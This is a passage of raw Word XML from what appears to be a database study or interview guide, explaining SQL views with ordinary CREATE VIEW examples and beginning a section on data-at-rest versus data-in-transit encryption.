        <w:t>Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Views can be used to restrict access to certain columns or rows of a table, providing a way to expose only relevant data to users or applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737DB097" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="433"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Updatable Views</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Some views are updatable, meaning you can perform INSERT, UPDATE, or DELETE operations on them, which in turn affect the underlying tables. However, not all views are updatable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EC8BD0" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When to Use Views</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BC8741" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="434"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simplifying Complex Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439D702D"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Encapsulate complex queries involving multiple joins, aggregations, or filters into a single view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E54498"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Creating a view to combine data from several tables into a unified representation for reporting purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494E1ACE"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VIEW customer_order_summary AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54672C2C"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customers.customer_id, customers.name, SUM(orders.total_amount) AS total_spent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15167DF0"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customers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA0D86"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JOIN orders ON customers.customer_id = orders.customer_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20157D09"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GROUP BY customers.customer_id, customers.name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736A9450" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="434"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Enhancing Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC8BD4B"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Restrict access to sensitive data by exposing only certain columns or rows through a view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6212C661"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Creating a view that omits sensitive salary information from an employee table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C87D10"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VIEW public_employee_info AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0772A5A8"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employee_id, name, department</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5449E583"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FROM employees;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F6B75F" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="434"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data Abstraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E576C0"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Provide a consistent interface to the data, abstracting changes to the underlying schema from users or applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E098947"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If table structures change, you can update the view to reflect the new schema without modifying the application code that relies on the view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE4475B" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="434"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reusability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06922A61"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Create reusable query definitions that can be used across multiple queries or applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3070872F"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Using a view to encapsulate a commonly used query logic, such as calculating average order values, which can be reused in different contexts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FED589" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="434"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Improving Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3652E334"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Optimize query performance by pre-computing and storing the results of complex queries in materialized views (if supported by the database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E31417" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43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Creating a materialized view that aggregates sales data to speed up reporting queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368673CC" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Types of Views</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1530D9" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="435"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simple View</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFFE992" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="435"/>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Based on a single table and usually involves a straightforward SELECT statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B05FBA" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43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E614296"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VIEW active_customers AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54446DA6"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 FROM customers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602F6E7E"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WHERE status = 'active';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AEB4EA" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="435"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Complex View</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475F2004" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="435"/>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Involves multiple tables, joins, and possibly aggregate functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275C1D56" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43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2ECF2F3D"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VIEW order_details AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D53F75F"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orders.order_id, customers.name, products.product_name, order_items.quantity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7945EAE6"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orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A516F45"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JOIN customers ON orders.customer_id = customers.customer_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71266B54"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JOIN order_items ON orders.order_id = order_items.order_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F0575F"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JOIN products ON order_items.product_id = products.product_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4454BA0B" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="435"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Materialized View</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in databases that support it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01720C5F" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="435"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A view that stores the result of the query physically and can be refreshed periodically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5139DC" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43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073DCAA9"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MATERIALIZED VIEW sales_summary AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68947A1A"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SELECT product_id, SUM(quantity) AS total_sold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231D26F1"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FROM sales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306BA9D1" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211"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GROUP BY product_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5E8E98" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9124A1" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="436"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Views can sometimes impact performance, especially if they involve complex queries or large datasets. Materialized views can help with performance but come with additional maintenance overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E36EBF0" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="436"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Updatability</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Not all views are updatable. The ability to perform DML operations (INSERT, UPDATE, DELETE) depends on the view's definition and the database system's support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BA4E0B" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E495400" w14:textId="34933602" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc178383319"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain the differences between data-at-rest encryption and data-in-transit encryption.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w14:paraId="29AE6979" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data-at-rest encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>data-in-transit encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> are two critical components of data security that protect data from unauthorized access and breaches. They address different aspects of data security, and together, they provide comprehensive protection for data throughout its lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231101ED" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data-at-Rest Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E83B910" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:p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Data-at-rest encryption refers to encrypting data that is stored on physical media, such as hard drives, databases, or cloud storage. This type of encryption protects data that is not actively being transmitted over a network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5F7E17" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:p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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30752C0C" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Protect Stored Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensures that data remains confidential and secure while stored, even if an unauthorized person gains access to the storage device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A278D39" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Compliance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Helps meet regulatory requirements and industry standards for data protection, such as GDPR or HIPAA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A617468" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Prevent Unauthorized Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Protects data from being read or accessed by unauthorized individuals or attackers who have physical access to storage media.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BBBC89" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
